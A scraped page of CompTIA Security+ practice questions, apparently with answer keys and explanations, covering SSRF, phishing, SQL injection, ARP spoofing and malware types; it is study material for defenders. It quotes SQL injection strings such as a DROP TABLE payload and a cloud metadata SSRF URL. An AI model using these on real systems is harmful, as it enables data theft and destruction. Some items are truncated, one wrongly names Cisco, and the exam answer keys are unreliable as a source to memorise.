and …","url":"https://courseiva.com/questions/comptia/security-plus/a-web-form-stores-a-user-s-comment-and-later-displays-it-to"},{"@type":"ListItem","position":38,"name":"A user receives an SMS from 'IT Service Desk' saying their MFA enrollment expires today and includes a shortened link. F…","url":"https://courseiva.com/questions/comptia/security-plus/a-user-receives-an-sms-from-it-service-desk-saying-their-mfa"},{"@type":"ListItem","position":39,"name":"An employee receives an email from someone claiming to be from IT. The message says the employee must read back a one-ti…","url":"https://courseiva.com/questions/comptia/security-plus/an-employee-receives-an-email-from-someone-claiming-to-be-from"},{"@type":"ListItem","position":40,"name":"NetFlow and authentication logs show one workstation opening SMB and WinRM sessions to many internal hosts within ten mi…","url":"https://courseiva.com/questions/comptia/security-plus/netflow-and-authentication-logs-show-one-workstation-opening-smb"}]}
A cloud-hosted API lets users supply a URL for the service to fetch an image. Shortly after release, logs show requests to 169.254.169.254 and internal admin addresses. What control best reduces this risk?
A.Allow the API to follow any redirect so it works with more image sources.
B.Restrict outbound requests to an allowlist and block internal address ranges.
C.Store the fetched image in encrypted form before sending it to users.
D.Increase the session timeout to reduce repeated logins by legitimate users.
AnswerB
This is a classic server-side request forgery pattern: the server is making attacker-influenced requests to internal or metadata addresses. An allowlist of approved destinations, combined with blocking private and link-local ranges, prevents the service from being used as a proxy into internal systems. That control directly targets the unsafe outbound request behavior and is more effective than trying to clean malicious URLs after the fact. It also reduces exposure to cloud metadata theft and internal service probing.
Why this answer
Option B is correct because restricting outbound requests to an allowlist and blocking internal address ranges directly mitigates the Server-Side Request Forgery (SSRF) vulnerability. The requests to 169.254.169.254 (the AWS/GCP/Azure metadata endpoint) and internal admin addresses indicate an attacker is using the API to probe internal services. An allowlist ensures the API only connects to trusted external hosts, while blocking private and link-local ranges prevents access to internal infrastructure.
Exam trap
The trap here is that candidates may confuse data-at-rest protection (encryption) with access control, or mistakenly think allowing redirects improves functionality without realizing it exacerbates SSRF; Cisco often tests the specific cloud metadata endpoint (169.254.169.254) as a classic SSRF indicator.
How to eliminate wrong answers
Option A is wrong because allowing the API to follow any redirect would actually increase the SSRF risk, as an attacker could craft a redirect from an allowed external URL to an internal or metadata endpoint, bypassing initial URL checks. Option C is wrong because storing the fetched image in encrypted form does not prevent the API from making unauthorized requests to internal or metadata endpoints; encryption protects data at rest, not the request origin or destination.
A finance analyst receives an email that appears to come from the CFO. It references a real project, asks for an urgent wire transfer to a "new vendor account," and says to avoid the normal approval workflow because the deal is time-sensitive. What is the best immediate response?
A.Reply to the email asking for additional payment details and wait for a response.
B.Process the transfer quickly because the message appears to come from an executive.
C.Verify the request using a known-good contact method and report the message as suspicious.
D.Forward the email to another finance employee so someone else can confirm the request.
AnswerC
The safest response is to independently verify the request through a trusted channel already on file, such as a known phone number or internal messaging system. That breaks the attacker’s control of the conversation and prevents a rushed financial error. Reporting the message also helps security staff search for related phishing attempts and protect other employees from a similar business email compromise attempt.
Why this answer
The best response is to verify the request through a known, trusted communication path and then report it. In a spear phishing or business email compromise scenario, the attacker relies on urgency, authority, and familiarity to bypass normal controls. A separate phone call, chat message, or in-person confirmation using an existing contact list provides stronger assurance than any reply to the suspicious email itself.
Why others are wrong: Replying, processing the transfer, or forwarding the message all keep the workflow inside the attacker’s channel and increase the chance of fraud. None of those actions independently validate the sender’s identity or the payment change request. The key security habit is to stop, verify outside the email thread, and escalate the suspicious communication.
A SIEM alert shows one workstation connecting to many internal systems over SMB in a short period of time, followed by attempts to access administrative shares. What is the best response?
A.Ignore the alert because SMB is a normal file-sharing protocol
B.Isolate the workstation to stop possible lateral movement
C.Increase the workstation's monitor brightness to help the user notice alerts
D.Disable all SMB traffic across the entire company immediately
AnswerB
Rapid SMB connections to multiple hosts are a strong sign of spread or lateral movement, so isolation is the safest immediate action.
Why this answer
Option B is correct because the SIEM alert describes classic indicators of lateral movement using SMB, often associated with ransomware or worm-like malware. Isolating the workstation immediately stops the attacker from spreading to other systems via administrative shares (e.g., ADMIN$, C$), which are commonly abused for remote execution. This containment step is the highest priority before any forensic analysis.
Exam trap
The trap here is that candidates may dismiss the alert as normal SMB traffic (Option A) because SMB is common, failing to recognize that the combination of rapid connections and administrative share access is a textbook lateral movement indicator.
How to eliminate wrong answers
Option A is wrong because while SMB is a normal file-sharing protocol, the specific pattern of rapid connections to many internal systems followed by administrative share access is highly anomalous and indicative of malicious lateral movement, not legitimate use. Option C is wrong because increasing monitor brightness has no security function and does not address the alert; it is a nonsensical response that confuses physical display settings with security operations. Option D is wrong because disabling all SMB traffic company-wide is an overly drastic and disruptive response that would break critical business operations, and it should only be considered after proper investigation and with targeted controls like firewall rules or GPO changes.
A user forwards an email that says their payroll account will be disabled today unless they click a link and verify their password. The message uses the company logo, but the sender address is from a free webmail domain and the link goes to a look-alike login page. What type of attack is this?
A.Baiting, because the attacker is offering something attractive to lure the user.
B.Phishing, because the attacker is using a fraudulent message to steal credentials.
C.Vishing, because the attacker is trying to trick the user into revealing information.
D.Impersonation, because the attacker is pretending to be someone from the company.
AnswerB
Phishing is the best match because the attacker is sending a deceptive message that impersonates a trusted source and directs the user to a fake login page. The goal is credential theft, and the urgency plus look-alike site are common signs. The sender address and request to verify a password are strong indicators of a phishing attempt.
Why this answer
This is a classic phishing attack because the attacker uses a fraudulent email that mimics a legitimate company to trick the user into clicking a link to a look-alike login page, with the goal of stealing their payroll credentials. The key indicators are the spoofed company logo, the free webmail sender address, and the fake login page, all of which are hallmarks of credential harvesting via phishing.
Exam trap
The trap here is that candidates may confuse phishing with vishing or baiting because all involve social engineering, but the specific use of email with a fraudulent link to a fake login page is the defining characteristic of phishing, not voice calls (vishing) or physical lures (baiting).
How to eliminate wrong answers
Option A is wrong because baiting involves offering something attractive (e.g., a free USB drive or download) to lure the victim into a trap, not sending a deceptive email requesting credential verification. Option C is wrong because vishing (voice phishing) uses phone calls or voice messages to trick victims, not email with a link to a fake login page. Option D is wrong because impersonation is a broader social engineering tactic that can be part of phishing, but the specific attack described—using a fraudulent email with a malicious link—is precisely defined as phishing, not impersonation alone.
A support portal searches customers by last name using a parameter called q. After one user enters a single quote, the app returns a SQL syntax error. A tester then submits `test' OR '1'='1` and sees every customer record. Which control most directly prevents this issue?
A.Parameterize the database queries with prepared statements
Prepared statements separate code from data, so attacker-controlled input cannot change the intended SQL query structure.
Why this answer
The vulnerability is SQL injection, which occurs when user input is directly concatenated into a SQL query. Parameterized queries (prepared statements) separate SQL logic from data by using placeholders, ensuring user input is treated as data only and never executed as code. This directly prevents the attacker from injecting malicious SQL fragments like `' OR '1'='1`.
Exam trap
The trap here is that candidates often confuse output encoding (XSS prevention) with input handling (SQL injection prevention), or they think network controls like VLANs can fix application-layer code flaws.
How to eliminate wrong answers
Option B is wrong because encoding output prevents cross-site scripting (XSS), not SQL injection; the attack occurs on the database backend, not in the browser. Option C is wrong because CSRF tokens prevent cross-site request forgery, which tricks a user into submitting unintended requests, but does not stop an attacker from directly crafting malicious input in the search parameter. Option D is wrong because moving the application to a separate VLAN is a network segmentation control that limits lateral movement but does not fix the insecure database query code; the SQL injection would still succeed from the application server.
The host receives repeated ARP replies claiming the gateway IP belongs to a different MAC address, and the same MAC appears on multiple switch ports. That combination indicates ARP spoofing or poisoning, which can redirect traffic through an attacker for interception or disruption. The brief forwarding to another IP is consistent with a man-in-the-middle attempt built on forged ARP replies.
Why this answer
ARP spoofing is the most likely attack because the exhibit shows an attacker sending forged ARP replies to associate the attacker's MAC address with the IP address of the default gateway. This poisons the ARP cache of the victim, causing all traffic destined for the gateway to be sent to the attacker instead, enabling man-in-the-middle interception.
Exam trap
The trap here is that candidates confuse ARP spoofing with DNS cache poisoning because both involve 'poisoning' a cache, but ARP operates at Layer 2 (MAC addresses) while DNS operates at Layer 7 (domain name resolution).
How to eliminate wrong answers
Option A is wrong because DNS cache poisoning involves corrupting a DNS resolver's cache with false DNS records, not manipulating ARP tables at Layer 2. Option C is wrong because a replay attack captures and retransmits valid data packets to trick the receiver, but the exhibit shows direct manipulation of MAC-to-IP mappings, not packet replay. Option D is wrong because an amplification denial-of-service attack uses small queries to generate large responses (e.g., DNS amplification), overwhelming a target with traffic, whereas the exhibit depicts local network ARP manipulation.
A Java-based internal portal accepts a serialized object during profile import. After a recent test upload, the server made outbound LDAP calls and created a new local account. What attack pattern best explains this behavior?
A.SQL injection, because the attacker likely altered a database query.
B.Cross-site scripting, because the attacker could have injected script into the portal.
C.Insecure deserialization, because a crafted object triggered unexpected server-side actions.
D.CSRF, because the attacker may have forced an administrator to submit a form.
AnswerC
Insecure deserialization occurs when an application accepts untrusted serialized data and rebuilds it unsafely. That can allow an attacker to trigger code paths, remote lookups, or even command execution, which matches the LDAP activity and account creation.
Why this answer
Option C is correct because the scenario describes a Java application accepting a serialized object during profile import, which is a classic vector for insecure deserialization attacks. By crafting a malicious serialized object, an attacker can trigger arbitrary code execution on the server, leading to outbound LDAP calls and local account creation—actions that are not part of normal profile import logic. This attack exploits the trust placed in serialized data without proper validation or integrity checks.
Exam trap
The trap here is that candidates may confuse insecure deserialization with other injection attacks (SQLi or XSS) because all involve untrusted input, but only deserialization directly allows server-side object reconstruction and arbitrary method invocation without proper validation.
How to eliminate wrong answers
Option A is wrong because SQL injection involves manipulating database queries through input fields, not through serialized objects; the described behavior (LDAP calls and account creation) is not typical of SQL injection, which primarily targets data extraction or modification. Option B is wrong because cross-site scripting (XSS) involves injecting client-side scripts into web pages viewed by other users, not server-side object deserialization; XSS cannot directly cause the server to make outbound LDAP calls or create local accounts.
Based on the exhibit, which attack is most likely being attempted against the application?
A.Cross-site scripting, because the attacker is trying to inject script into the victim's browser session.
B.Server-side request forgery, because the application is being tricked into making internal requests on the attacker's behalf.
C.Cross-site request forgery, because the attacker is forcing an authenticated user to submit an unwanted request.
D.SQL injection, because the attacker is manipulating a query parameter to expose backend data.
AnswerB
The application accepts a URL parameter and then makes outbound requests to internal resources, including the cloud metadata endpoint. That is the hallmark of SSRF. The attacker is causing the server to reach addresses that should not normally be accessible through a public request path.
Why this answer
The exhibit shows an attacker manipulating a URL parameter (e.g., `?url=http://169.254.169.254/latest/meta-data/`) to make the application fetch an internal resource. This is a classic Server-Side Request Forgery (SSRF) attack, where the application is tricked into making requests to internal services (like cloud metadata endpoints) on the attacker's behalf, bypassing network segmentation.
Exam trap
CompTIA often tests SSRF by showing a URL parameter like `?url=` or `?file=` pointing to an internal IP (e.g., 127.0.0.1 or 169.254.169.254), and candidates confuse it with CSRF because both involve 'forged requests,' but SSRF is server-side while CSRF is client-side.
How to eliminate wrong answers
Option A is wrong because cross-site scripting (XSS) involves injecting client-side scripts (e.g., JavaScript) into a victim's browser, not manipulating server-side requests to internal resources. Option C is wrong because cross-site request forgery (CSRF) forces an authenticated user to submit an unwanted request (e.g., via a forged HTTP POST), but the exhibit shows the attacker directly controlling the request URL, not relying on a victim's session. Option D is wrong because SQL injection targets database queries via input fields (e.g., `' OR 1=1--`), not URL parameters that trigger server-side HTTP requests to internal IPs.
A login form sends user input directly into a database query. When a tester enters a single quote character, the application returns a database error. What attack is most likely?
A.Cross-site scripting
B.SQL injection
C.Session hijacking
D.Insecure deserialization
AnswerB
This is SQL injection because the application appears to concatenate unsanitized input into a database query. A single quote often breaks query syntax and reveals that user input is being interpreted as part of the SQL command. That is a common sign the application is vulnerable to injection attacks.
Why this answer
The application directly concatenates user input into a database query without sanitization. Entering a single quote breaks the SQL syntax, causing a database error, which is a classic indicator of SQL injection (SQLi). This vulnerability allows an attacker to manipulate the query structure and potentially extract or modify database contents.
Exam trap
The trap here is that candidates may confuse the immediate error response with cross-site scripting (XSS), but the database error clearly indicates the injection is targeting the SQL layer, not the browser's DOM.
How to eliminate wrong answers
Option A is wrong because cross-site scripting (XSS) involves injecting client-side scripts into web pages viewed by other users, not directly into database queries, and a single quote would not typically trigger a database error in an XSS context. Option C is wrong because session hijacking targets an authenticated user's session token (e.g., via theft or fixation) and does not involve injecting characters into a login form to cause a database error. Option D is wrong because insecure deserialization exploits the processing of serialized objects (e.g., PHP or Java serialization) to execute arbitrary code or manipulate application logic, not by sending a single quote into a database query.
An accounts payable clerk receives an email that appears to come from a long-time vendor. The message asks for an urgent change to bank routing information, says the CFO is traveling, and requests that no one call back because the matter is confidential. The display name looks legitimate, but the reply-to address is different from the sender identity. Which three findings most strongly indicate a pretexting or business email compromise attempt? Select three.
Select 3 answers
A.The message requests a payment change outside the normal approval workflow.
B.The reply-to address does not match the claimed sender identity.
C.The recipient is told to keep the request confidential and avoid calling back.
D.The email contains a professional logo and a consistent signature block.
E.The email uses correct spelling and grammar throughout.
AnswersA, B, C
Unauthorized changes to payment instructions are a classic business email compromise tactic. This bypasses established controls and tries to exploit urgency. It is one of the strongest indicators because legitimate vendors normally accept verification through established channels, not a one-off email request.
Why this answer
Option A is correct because the request for a payment change outside the normal approval workflow is a classic indicator of business email compromise (BEC). Attackers exploit the absence of standard verification steps, such as dual authorization or manager sign-off, to redirect funds fraudulently. This bypass of established procedures directly aligns with the social engineering technique of pretexting, where the attacker fabricates a scenario (urgent, confidential, CFO traveling) to pressure the victim into violating policy.
Exam trap
CompTIA often tests the misconception that surface-level professionalism (logos, grammar) indicates legitimacy, when in fact these are easily replicated and the true red flags are procedural violations and header mismatches.
Based on the exhibit, what type of attack is most likely being used against the accounts payable team?
A.Phishing, because the message asks recipients to open a file and respond quickly.
B.Spear phishing, because the email is tailored to a specific team, project, and recipient.
C.Pretexting, because the sender claims to have spoken with the recipient before.
D.Baiting, because the attacker offers a useful file related to the project.
AnswerB
This is spear phishing because the attacker uses personalized details such as the recipient's name, the internal project name, and a plausible business deadline. Those details are meant to increase trust and pressure the victim into taking action. The goal is to trick a specific target or group, not to send an indiscriminate message to everyone.
Why this answer
B is correct because spear phishing is a targeted attack where the email is customized for a specific individual or group, using personal details like the recipient's name, team, and project to increase credibility. The exhibit shows the email addresses the recipient by name, references the 'Acme Corp Q3 audit' project, and is sent to the accounts payable team, which matches the tailored nature of spear phishing. This makes it more convincing than generic phishing, as the attacker has researched the target to craft a relevant lure.
Exam trap
The trap here is that candidates confuse spear phishing with generic phishing because both involve email, but the key differentiator is the level of personalization—spear phishing uses specific details like the recipient's name and project, while phishing uses generic greetings like 'Dear Customer'.
How to eliminate wrong answers
Option A is wrong because phishing is a broad, untargeted attack sent to many recipients, while the email in the exhibit is specifically addressed to a named individual on the accounts payable team and references a specific project, indicating it is tailored. Option C is wrong because pretexting involves creating a fabricated scenario (e.g., impersonating a colleague or authority figure) to gain trust, but the email does not establish a false identity or backstory beyond claiming a prior conversation, which is a common spear phishing tactic, not a full pretext. Option D is wrong because baiting typically offers a physical item (e.g., a USB drive) or a digital download (e.g., a free file) to lure victims, but the email asks the recipient to open an attached file related to the project, which is a delivery mechanism for malware, not the core attack type—spear phishing better describes the targeted social engineering.
A finance application works normally for weeks after a contractor leaves the company. On the first business day of the quarter, a hidden task runs, deletes archived reports, and then removes itself from the scheduled task list. What type of malware behavior is this?
A.Worm
B.Logic bomb
C.Rootkit
D.Spyware
AnswerB
A logic bomb triggers on a condition such as a date, event, or account status to execute harmful actions.
Why this answer
The malware behavior described is a logic bomb because it lies dormant for a specific period (weeks) and triggers on a predefined condition (the first business day of the quarter) to execute a malicious payload (deleting archived reports) and then self-destructs by removing itself from the scheduled task list. This matches the definition of a logic bomb: malicious code that executes when a logical condition is met, often used for sabotage or delayed attacks.
Exam trap
The trap here is that candidates confuse a logic bomb with a worm because both can execute code automatically, but they fail to recognize that a worm's defining characteristic is self-propagation across networks, not a delayed, condition-based trigger.
How to eliminate wrong answers
Option A is wrong because a worm is self-replicating malware that spreads automatically across networks without user intervention, whereas this scenario involves a hidden task that does not replicate or spread. Option C is wrong because a rootkit is designed to hide the presence of malware or unauthorized processes by modifying the operating system kernel or using hooking techniques, not to trigger a delayed destructive action based on a date. Option D is wrong because spyware is focused on covertly collecting and exfiltrating user data (e.g., keystrokes, browsing habits) without the user's knowledge, not on deleting files or self-removal after a time-based trigger.
Based on the exhibit, what is the MOST likely explanation for the network traffic?
The affected host is not showing a large amount of internet-bound traffic, but its DNS behavior is highly unusual.
A.DNS tunneling used for command-and-control or data transfer
B.ARP poisoning causing the host to redirect traffic to a rogue gateway
C.A browser cache synchronization feature repeatedly polling a cloud service
D.A misconfigured static route sending all web traffic to the wrong subnet
AnswerA
The long random-looking subdomains, repeated NXDOMAIN responses, and lack of normal web traffic are consistent with malicious DNS-based communication.
Why this answer
The exhibit shows a host with minimal internet-bound traffic but highly unusual DNS behavior, such as frequent queries to a single domain or large DNS query sizes. This pattern is characteristic of DNS tunneling, where data is encoded in DNS queries and responses to bypass network controls, often used for command-and-control (C2) communication or covert data exfiltration. The lack of other traffic indicates the host is not performing normal web browsing or data transfers, making DNS tunneling the most likely explanation.
Exam trap
The trap here is that candidates may overlook the significance of 'unusual DNS behavior' and minimal internet traffic, instead focusing on common attacks like ARP poisoning or benign browser features, which would produce different traffic patterns (e.g., high traffic or periodic HTTP requests).
How to eliminate wrong answers
Option B is wrong because ARP poisoning would cause the host to redirect traffic to a rogue gateway, resulting in a large amount of internet-bound traffic as the host communicates through the attacker's system, not minimal traffic with unusual DNS behavior. Option C is wrong because a browser cache synchronization feature repeatedly polling a cloud service would generate consistent, periodic HTTP/HTTPS traffic to a known cloud provider, not the highly unusual DNS queries (e.g., high query rates, large TXT records) seen in the exhibit, and would not explain the lack of other internet-bound traffic.
A security analyst is reviewing logs after a successful phishing attack. The attacker used a fake login page that mimicked the company's single sign-on portal to harvest usernames and passwords. The attacker then used the stolen credentials to access the corporate email system. Which type of attack best describes the initial compromise?
A.On-path attack
B.Credential harvesting via phishing
C.Brute-force attack
D.Password spraying
AnswerB
Correct. The attacker used a deceptive email or website to trick users into voluntarily entering their credentials. This is the defining characteristic of phishing-based credential harvesting. The stolen credentials were then reused to access the corporate email system.
Why this answer
The initial compromise was achieved by luring the victim to a fake login page that mimicked the company's single sign-on portal, which is a classic phishing technique. The attacker harvested the credentials directly from the user's submission, making this a credential harvesting attack via phishing. This aligns with the definition of phishing as a social engineering attack that uses deception to obtain sensitive information, distinct from brute-force or password spraying which rely on guessing or trying multiple passwords.
Exam trap
The trap here is that candidates may confuse credential harvesting via phishing with an on-path attack, because both involve intercepting credentials, but phishing relies on user deception to voluntarily submit credentials, whereas an on-path attack captures them transparently during an existing session.
How to eliminate wrong answers
Option A is wrong because an on-path attack (formerly man-in-the-middle) intercepts and potentially modifies communications between two parties in real time, whereas here the attacker used a fake page to collect credentials directly from the user, not by intercepting an existing session. Option C is wrong because a brute-force attack systematically tries all possible password combinations against a known username, which is not what occurred; the attacker harvested valid credentials from the user, not guessed them. Option D is wrong because password spraying attempts a few common passwords against many usernames to avoid lockouts, but in this scenario the attacker obtained the exact credentials from the victim via a deceptive login page, not by guessing passwords across accounts.
A scan finds two issues: a critical flaw on a lab server reachable only through VPN, and a high-severity flaw on an internet-facing file transfer appliance with active exploitation in the wild. Which should be remediated first?
A.The lab server, because critical severity is always higher than high severity.
B.The internet-facing file transfer appliance, because exploitability and exposure increase risk.
C.Both issues at the same time, because prioritization is unnecessary when two findings are present.
D.The lab server, because systems behind VPN are always more trusted than public systems.
AnswerB
The internet-facing appliance should be fixed first because it is exposed to untrusted users and already being exploited in the wild. Risk-based prioritization considers not only severity but also exposure, exploit availability, and business impact. A high-severity flaw with active exploitation on a public-facing system is usually more urgent than a critical flaw on a restricted lab server.
Why this answer
The internet-facing file transfer appliance with active exploitation in the wild presents a higher risk because it is directly exposed to untrusted networks and has a known exploit that attackers are actively using. Even though the lab server has a critical severity rating, its reachability only through VPN significantly reduces its attack surface and likelihood of exploitation. Risk is a function of both severity and exploitability/exposure, so the actively exploited, internet-facing asset should be remediated first.
Exam trap
The trap here is that candidates assume CVSS severity alone dictates remediation order, ignoring that exploitability and exposure (e.g., internet-facing vs. VPN-restricted) are critical factors in risk-based prioritization.
How to eliminate wrong answers
Option A is wrong because severity alone does not determine remediation priority; a critical flaw on a VPN-restricted lab server is less exploitable than a high-severity flaw on an internet-facing system with active exploitation. Option C is wrong because prioritization is essential when resources are limited; remediating both simultaneously is often impractical and ignores the higher immediate risk posed by the actively exploited internet-facing appliance.
A security analyst is reviewing web server logs from an e-commerce application. The logs show repeated requests containing URLs with appended strings such as: `' OR '1'='1' --` and `'; DROP TABLE Users; --`. The application returned HTTP 200 responses with unexpected data in several instances. Which type of attack is most likely being attempted?
A.SQL injection
B.LDAP injection
C.Command injection
D.Cross-site scripting (XSS)
AnswerA
Correct. The log entries show SQL syntax such as `OR '1'='1'` and `DROP TABLE`, which are classic indicators of SQL injection attempts. This attack exploits improper input sanitization to manipulate database queries.
Why this answer
The repeated requests contain classic SQL injection payloads, such as `' OR '1'='1' --` (used to bypass authentication or extract data) and `'; DROP TABLE Users; --` (used to delete database tables). The HTTP 200 responses with unexpected data confirm that the application is vulnerable to SQL injection, as the injected SQL code is being executed against the backend database. This attack targets the SQL database layer, not LDAP directories or operating system commands.
Exam trap
The trap here is that candidates may confuse SQL injection with command injection because both use special characters like `'` and `;`, but command injection requires OS command separators and system commands, whereas SQL injection uses database-specific syntax and keywords.
How to eliminate wrong answers
Option B (LDAP injection) is wrong because the payloads contain SQL syntax (e.g., `OR '1'='1'`, `DROP TABLE`) and are appended to URLs, which is characteristic of SQL injection, not LDAP injection which uses LDAP query syntax like `(&(uid=*)(userPassword=*))`. Option C (Command injection) is wrong because the payloads do not include operating system command separators (e.g., `;`, `&&`, `|`) or system commands (e.g., `ls`, `whoami`); instead, they use SQL-specific keywords like `DROP TABLE` and `--` for comment injection.
A help desk technician receives a call from someone claiming to be a new contractor whose MFA app failed during travel. The caller knows the company org chart, names the technician's supervisor, and says the technician should use a callback number included in a text message they just sent. What is the safest first action?
A.Reset MFA immediately, since the caller has provided enough internal details to seem credible.
B.Ask the caller to read a one-time code aloud so the technician can confirm their identity.
C.End the call and verify the request through a published help desk number or ticketing system.
D.Approve the request if the caller can name the supervisor and the contractor's project team.
AnswerC
The safest first action is to stop using information supplied by the caller and verify through a trusted, independently obtained contact path. Because the attacker already knows internal details and provided a callback number in a text, those channels cannot be trusted. Using a published help desk number or the official ticketing system preserves least risk and prevents social engineering from extending into account reset abuse.
Why this answer
Option C is correct because the safest first action when receiving an unsolicited call requesting privileged actions (like MFA reset) is to independently verify the request through official channels. The caller's knowledge of internal details (org chart, supervisor name) and the request to use a callback number from a text message are classic social engineering red flags, as the callback number could be attacker-controlled. Hanging up and calling back via a published help desk number ensures the request is legitimate and prevents MFA bypass or account takeover.
Exam trap
The trap here is that candidates may assume the caller's knowledge of internal details (supervisor name, org chart) is sufficient proof of identity, but CompTIA tests the principle that any unsolicited request for privileged actions must be independently verified through a trusted channel, not through information the caller provides.
How to eliminate wrong answers
Option A is wrong because resetting MFA immediately based on internal details alone is dangerous; attackers can gather org chart and supervisor names via OSINT or previous breaches, and MFA reset is a high-risk action that should require verified identity. Option B is wrong because asking the caller to read a one-time code aloud is insecure; a one-time code sent to the caller's device could be intercepted or the caller could be the attacker who generated the code themselves, and this method does not verify the caller's identity against a trusted source. Option D is wrong because naming a supervisor and project team is not sufficient authentication; these details are often publicly available or easily guessed, and approving the request without independent verification violates the principle of least privilege and allows unauthorized access.
Users on a wired subnet report intermittent outages when reaching an internal application. A packet capture shows the default gateway IP address repeatedly mapped to a different workstation MAC address, and traffic is being forwarded through that workstation. What attack is most likely occurring?
A.DNS poisoning, because the hostname is resolving to the wrong server.
B.ARP spoofing, because false Layer 2 address mappings are redirecting traffic.
C.Replay attack, because packets are being resent to the gateway.
D.Rogue DHCP service, because clients are losing access to the default gateway.
AnswerB
ARP spoofing, also called ARP poisoning, happens when a host sends forged ARP messages that associate a target IP address with the attacker’s MAC address. In this case, the gateway IP is repeatedly being mapped to a workstation MAC, and traffic is being relayed through that workstation. That is a classic man-in-the-middle setup on a local network segment.
Why this answer
B is correct because ARP spoofing (also known as ARP poisoning) involves an attacker sending forged ARP messages over a local area network. This results in the attacker's MAC address being associated with the IP address of the default gateway, causing traffic destined for the gateway to be forwarded to the attacker's workstation instead. The packet capture evidence of the default gateway IP repeatedly mapped to a different workstation MAC address is the classic signature of this attack.
Exam trap
The trap here is that candidates often confuse ARP spoofing with DNS poisoning because both involve redirecting traffic, but ARP spoofing operates at Layer 2 (MAC address manipulation) while DNS poisoning operates at Layer 7 (hostname resolution).
How to eliminate wrong answers
Option A is wrong because DNS poisoning involves corrupting the DNS resolver cache or DNS server records to map a domain name to an incorrect IP address, not manipulating Layer 2 MAC-to-IP mappings on a local subnet. Option C is wrong because a replay attack involves capturing and retransmitting valid data packets to trick the receiver, not altering ARP tables to redirect traffic through a rogue host. Option D is wrong because a rogue DHCP service would assign incorrect IP configuration (including a fake gateway IP) to clients, but the symptom described is a specific MAC-to-IP mapping conflict for the existing gateway, not a DHCP lease issue.
A Linux server is missing expected security-agent processes, but users can still connect to the application. Local command output does not show a suspicious daemon that another monitoring tool says is listening on port 4444. A raw disk scan reveals a kernel module loaded at boot, and several files appear only when viewed outside the normal operating system tools. What malware type is most likely?
A.Trojan, because it could have introduced the suspicious service after the initial compromise.
B.Spyware, because it may collect data while leaving the application functional.
C.Rootkit, because kernel-level components are hiding processes and files from normal user-mode visibility.
D.Logic bomb, because the malware activates after startup and changes what administrators see.
AnswerC
A rootkit is the best answer because the evidence points to concealment at the operating system level. A kernel module loaded at boot, missing processes in standard listings, and files visible only through raw disk examination all indicate malicious hiding behavior. Rootkits are designed to obscure other malware or unauthorized access, making them especially dangerous and difficult to detect with normal administrative tools.
Why this answer
Option C is correct because the scenario describes a rootkit: a kernel-level rootkit can load a malicious kernel module at boot, intercept system calls (e.g., `open`, `readdir`, `netstat`), and hide processes, files, and network listeners from user-mode tools like `ps`, `ls`, or `netstat`. The raw disk scan reveals files invisible to normal OS tools, and the missing security-agent processes and hidden daemon on port 4444 are classic signs of kernel-mode hooking that bypasses standard visibility.
Exam trap
The trap here is that candidates may confuse a rootkit with a Trojan or spyware because all three can persist, but only a rootkit operates at kernel level to hide its artifacts from user-mode commands like `ps`, `ls`, and `netstat`.
How to eliminate wrong answers
Option A is wrong because a Trojan is a type of malware that disguises itself as legitimate software but does not inherently provide kernel-level hiding capabilities; the key evidence here is kernel module loading and file/process concealment, which is the hallmark of a rootkit, not a Trojan. Option B is wrong because spyware focuses on data collection and typically does not modify the kernel to hide its own processes or files; the described behavior of hiding a daemon and files from normal tools goes far beyond spyware's typical user-mode surveillance.
A user's workstation suddenly renames documents with a new extension, displays a ransom note, and blocks access to a shared drive. Which two indicators support ransomware? Select two.
Select 2 answers
A.Files are renamed or encrypted and no longer open normally
B.A ransom note demands payment for decryption or restoration
C.The mouse pointer moves slowly after long idle periods
D.The browser homepage changed after a software update
E.A new USB keyboard is detected by the operating system
AnswersA, B
Renamed or encrypted files are a strong sign of ransomware because the malware is preventing normal access to data.
Why this answer
Option A is correct because ransomware typically encrypts files and renames them with a new extension (e.g., .encrypted, .locked), making them unopenable without the decryption key. This behavior directly matches the scenario where documents are renamed and access is blocked, confirming file encryption as a core indicator of ransomware.
Exam trap
The trap here is that candidates may confuse general system performance issues (like a slow mouse) with ransomware indicators, but ransomware focuses on file encryption and ransom demands, not on input device behavior.
Based on the exhibit, what is the BEST response by the employee?
The message appears to come from a trusted internal support team, but the sender details and request do not align with normal procedures.
A.Verify the request using a known internal help desk number or portal before taking any action.
B.Reply with the six-digit code so the help desk can complete the repair quickly.
C.Open the linked repair page from the email and sign in immediately to avoid suspension.
D.Forward the message to the manager and continue using the account until the suspension occurs.
AnswerA
This message combines urgency, a mismatched reply-to address, and a request for an MFA code. Independent verification is the safest response.
Why this answer
Option A is correct because verifying the request through a known internal help desk number or portal is the standard security practice to confirm the legitimacy of any unexpected communication, especially when sender details and procedures do not align. This approach mitigates the risk of social engineering attacks, such as phishing or business email compromise (BEC), where attackers impersonate trusted entities to trick employees into revealing sensitive information or performing unauthorized actions. By using an independently verified contact method, the employee ensures they are not falling victim to a fraudulent request that could lead to account compromise or data breach.
Exam trap
The trap here is that candidates may assume the email is legitimate because it appears to come from a trusted internal source, leading them to choose an action that involves direct interaction with the email (like replying or clicking a link) rather than verifying through an independent channel, which is the core principle of social engineering defense.
How to eliminate wrong answers
Option B is wrong because replying with a six-digit code directly to the email sender could provide an attacker with a one-time passcode (OTP) or verification code, enabling them to bypass multi-factor authentication (MFA) or gain unauthorized access to the employee's account. Option C is wrong because opening a linked repair page from the email and signing in immediately could lead to a credential harvesting site that captures the employee's username and password, compromising their account. Option D is wrong because forwarding the message to the manager and continuing to use the account until suspension occurs does not prevent potential compromise; the employee remains vulnerable to further exploitation while the manager investigates, and the account could be used maliciously in the interim.
Several users on the same subnet report that their traffic to the default gateway is intermittently slow and sometimes reaches the wrong device. A packet capture shows ARP replies that map the gateway IP to a different MAC address. What attack is most likely occurring?
A.ARP spoofing, which poisons address resolution on the local network
B.DNS amplification, which overwhelms the target with reflected DNS traffic
C.Replay attack, which resends captured authentication data
D.Port scanning, which probes hosts for open services and ports
AnswerA
ARP spoofing sends false ARP information so hosts associate the gateway IP with the attacker's MAC address.
Why this answer
ARP spoofing (also known as ARP poisoning) is the correct answer because the attacker sends forged ARP replies that associate the default gateway's IP address with the attacker's MAC address. This causes the victims' switches to update their ARP caches with the false mapping, so traffic destined for the gateway is instead sent to the attacker, leading to intermittent connectivity and misrouted packets. The symptoms—slow traffic and reaching the wrong device—are classic indicators of a man-in-the-middle (MITM) attack via ARP cache poisoning.
Exam trap
